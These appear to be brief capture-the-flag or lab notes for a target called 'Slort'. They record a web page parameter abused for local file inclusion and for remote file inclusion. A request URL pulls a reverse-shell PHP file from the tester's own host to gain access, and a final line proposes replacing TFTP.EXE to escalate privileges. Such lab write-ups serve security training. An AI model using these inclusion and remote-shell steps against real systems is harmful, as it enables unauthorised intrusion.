Slort
Enumeration
/site - URL
Theme and contents:
https://freehtml5.co/p-preview/?item=beryllium-free-architect-html5-template-built-with-bootstrap
http://192.168.153.53:4443/site/index.php?page=main.php
page parameter - LFI or RFI?
?page=\WINDOWS\system32\drivers\etc\hosts - LFI ok.
?page=http://192.168.49.153 - RFI ok.
Initial Access
https://www.revshells.com/ - Ivan Sincek - 80 - cmd -> shell.php
http://192.168.153.53:4443/site/index.php?page=http://192.168.49.153:8080/shell.php
PrivEsc
So we can replace TFTP.EXE file with executable.
Last updated